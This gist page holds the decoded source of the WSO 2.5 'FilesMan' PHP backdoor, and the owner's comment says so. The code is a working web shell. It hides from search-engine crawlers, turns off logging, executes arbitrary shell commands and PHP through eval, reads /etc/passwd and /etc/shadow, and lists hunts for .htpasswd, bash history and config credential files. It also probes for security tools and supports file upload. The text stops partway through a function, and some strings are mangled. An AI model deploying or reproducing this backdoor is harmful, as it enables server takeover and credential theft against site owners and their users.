Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
<?php if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if (get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
}
if (strtolower(substr(PHP_OS, 0, 3)) == "win") $os = 'win';
else $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace("\", " / ", $home_cwd);
$cwd = str_replace("\", " / ", $cwd);
}
if($cwd[strlen($cwd) - 1] != '/')
$cwd .= '/';
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
if($os == 'win')
$aliases = array(
"ListDirectory" => "dir",
"Findindex . phpincurrentdir" => "dir / s / w / bindex . php",
"Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php",
"Showactiveconnections" => "netstat - an",
"Showrunningservices" => "netstart",
"Useraccounts" => "netuser",
"Showcomputers" => "netview",
"ARPTable" => "arp - a",
"IPConfiguration" => "ipconfig / all"
);
else
$aliases = array(
"Listdir" => "ls - lha",
"listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va",
"showopenedports" => "netstat - an | grep - ilisten",
"processstatus" => "psaux",
"Find" => "",
"findallsuidfiles" => "find / -typef - perm - 04000 - ls",
"findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls",
"findallsgidfiles" => "find / -typef - perm - 02000 - ls",
"findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls",
"findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php",
"findconfig * files" => "find / -typef - name\"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
function wsoHeader() {
if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
var p1_ = '" . ((strpos(@$_POST['p1'], "
") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
var p2_ = '" . ((strpos(@$_POST['p2'], "
") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
var p3_ = '" . ((strpos(@$_POST['p3'], "
") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
if (strpos('Linux', $kernel) !== false) $explink.= urlencode('Linux Kernel ' . substr($release, 0, 6));
else $explink.= urlencode($kernel . ' ' . substr($release, 0, 3));
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0;$i < $n - 1;$i++) {
$cwd_links.= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . '/';
$cwd_links.= "\")'>" . $path[$i] . "/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $item) $opt_charsets.= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
$m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) $menu.= '<th width="' . (int)(100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\'))
$drives .= ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > ';
}
echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
' . ($GLOBALS['os'] == 'win'?' < br > Drives:
':'') . ' < / span > < / td > '
. ' < td > < nobr > ' . substr(@php_uname(), 0, 120) . ' < ahref = "' . $explink . '"target = _blank > [exploit - db . com] < / a > < / nobr > < br > ' . $uid . '(' . $user . ') < span > Group: < / span > ' . $gid . '(' . $group . ') < br > ' . @phpversion() . ' < span > Safemode: < / span > ' . ($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = green > < b > OFF < / b > < / font > ')
. ' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
function wsoFooter() {
$is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
function posix_getpwuid($p) {
return false;
}
}
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
function posix_getgrgid($p) {
return false;
}
}
function wsoEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("
", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) $out.= fread($f, 1024);
pclose($f);
}
return $out;
}
function wsoViewSize($s) {
if (is_int($s)) $s = sprintf("%u", $s);
if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
else return $s . ' B';
}
function wsoPerms($p) {
if (($p & 0xC000) == 0xC000) $i = 's';
elseif (($p & 0xA000) == 0xA000) $i = 'l';
elseif (($p & 0x8000) == 0x8000) $i = '-';
elseif (($p & 0x6000) == 0x6000) $i = 'b';
elseif (($p & 0x4000) == 0x4000) $i = 'd';
elseif (($p & 0x2000) == 0x2000) $i = 'c';
elseif (($p & 0x1000) == 0x1000) $i = 'p';
else $i = 'u';
$i.= (($p & 0x0100) ? 'r' : '-');
$i.= (($p & 0x0080) ? 'w' : '-');
$i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
$i.= (($p & 0x0020) ? 'r' : '-');
$i.= (($p & 0x0010) ? 'w' : '-');
$i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
$i.= (($p & 0x0004) ? 'r' : '-');
$i.= (($p & 0x0002) ? 'w' : '-');
$i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function wsoPermsColor($f) {
if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}
function wsoScandir($dir) {
if (function_exists("scandir")) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) $files[] = $filename;
return $files;
}
}
function wsoWhich($p) {
$path = wsoEx('which ' . $p);
if (!empty($path)) return $path;
return false;
}
function actionSecInfo() {
wsoHeader();
echo '<h1>Server security information</h1><div class=content>';
function wsoSecParam($n, $v) {
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "
") === false) echo $v . '<br>';
else echo '<pre class=ml1>' . $v . '</pre>';
}
}
wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
wsoSecParam('Open base dir', @ini_get('open_basedir'));
wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
$temp = array();
if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . ")";
if (function_exists('mssql_connect')) $temp[] = "MSSQL";
if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
if (function_exists('oci_connect')) $temp[] = "Oracle";
wsoSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if ($GLOBALS['os'] == 'nix') {
wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
wsoSecParam('OS version', @file_get_contents('/proc/version'));
wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
echo '<br>';
$temp = array();
foreach ($userful as $item) if (wsoWhich($item)) $temp[] = $item;
wsoSecParam('Userful', implode(', ', $temp));
$temp = array();
foreach ($danger as $item) if (wsoWhich($item)) $temp[] = $item;
wsoSecParam('Danger', implode(', ', $temp));
$temp = array();
foreach ($downloaders as $item) if (wsoWhich($item)) $temp[] = $item;
wsoSecParam('Downloaders', implode(', ', $temp));
echo '<br/>';
wsoSecParam('HDD space', wsoEx('df -h'));
wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
$temp = "";
for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid) $temp.= join(':', $uid) . "
";
}
echo '<br/>';
wsoSecParam('Users', $temp);
}
}
} else {
wsoSecParam('OS Version', wsoEx('ver'));
wsoSecParam('Account Settings', wsoEx('net accounts'));
wsoSecParam('User Accounts', wsoEx('net user'));
}
echo '</div>';
wsoFooter();
}
function actionPhp() {
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'
@ppshobi

This comment has been minimized.

Copy link
Owner Author

@ppshobi ppshobi commented Sep 20, 2016

cgi.php decoded, Filesman PHP Backdoor

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment